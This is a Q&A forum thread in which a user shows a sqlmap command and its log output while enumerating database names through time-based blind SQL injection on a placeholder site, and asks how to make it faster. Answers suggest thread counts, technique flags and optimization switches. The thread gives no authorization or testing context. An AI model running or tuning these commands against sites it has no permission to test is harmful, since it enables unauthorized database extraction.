Reputation: 14593
sqlmap is too slow
Here's an example. Just trying to list the databases:
python sqlmap.py -u "http://somesite.com/?id=1" --dbs
[15:20:32] [INFO] fetching database names
[15:20:32] [INFO] fetching number of databases
[15:20:32] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[15:20:39] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
2
[15:20:55] [INFO] adjusting time delay to 2 seconds due to good response times
2
[15:20:58] [INFO] retrieved: 100_MYDB
[15:22:39] [INFO] retrieved: DEV_GC_DATASTORAGE
[15:26:15] [INFO] retrieved: GC_
You can see in the timestamps it takes about 3 minutes to list 1 database name, it goes character by character, each character takes ~7 seconds. The tutorials I've seen on youtube are superfast... What can I do to speed this up? I've tried messing with .conf
Thanks.
Upvotes: 5
Views: 27811
Answers (4)
Reputation: 41
you can use like this for response fast. sqlmap -u "http://somesite.com/?id=1" --time-sec 15
Upvotes: -1
Reputation: 3246
Use more threads. Default is 1:
--threads=THREADS
Max number of concurrent HTTP(s) requests (default 1)
Upvotes: 1
Reputation: 422
You can also use the -o switch for some optimizations. Also try --technique=BEUS
Upvotes: 2
Reputation: 14593
What is the network latency to somesite.com? You can check this by simply doing ping somesite.com. If the latency is high, doing blind SQL injection will be slow as you test char by char. – rgerganov Jul 4 at 19:43
Upvotes: 1
Related Questions
- Sqlmap, using technique
- How sqlmap internally works?
- Getting 'connection time out' error each time on the same step in sqlmap
- SQLMap succesul inject query browsing
- Specify parameters with SQLMAP
- Sqlmap post data
- Sqlmap traffic capture
- SQLMap realy slow on local network
- Setting particular type of attack with Sqlmap
- SQLMAP to test sql injection